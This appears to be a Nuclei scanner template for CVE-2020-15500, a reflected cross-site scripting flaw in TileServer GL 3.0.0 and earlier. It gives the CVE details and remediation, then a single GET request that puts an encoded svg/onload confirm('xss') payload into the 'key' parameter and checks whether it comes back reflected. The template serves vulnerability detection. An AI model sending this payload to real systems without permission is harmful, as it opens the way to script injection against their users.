52 lines
1.9 KiB
YAML
52 lines
1.9 KiB
YAML
id: CVE-2020-15500
|
|
|
|
info:
|
|
name: TileServer GL <=3.0.0 - Cross-Site Scripting
|
|
author: Akash.C
|
|
severity: medium
|
|
description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
|
|
remediation: |
|
|
Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://github.com/maptiler/tileserver-gl/issues/461
|
|
- http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-15500
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-15500
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00382
|
|
epss-percentile: 0.72931
|
|
cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: tileserver
|
|
product: tileservergl
|
|
tags: cve,cve2020,xss,tileserver,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "'>\"<svg/onload=confirm('xss')>"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100c4a817a3bf62c93b546943872a006abcedb9e1486cae3c1c1ac90246d2f59d7c022100afbbff76959d05d0167dfd6bfdf2cb8af859278534258eff05a22b63130268d5:922c64590222798bb761d5b6d8e72950 |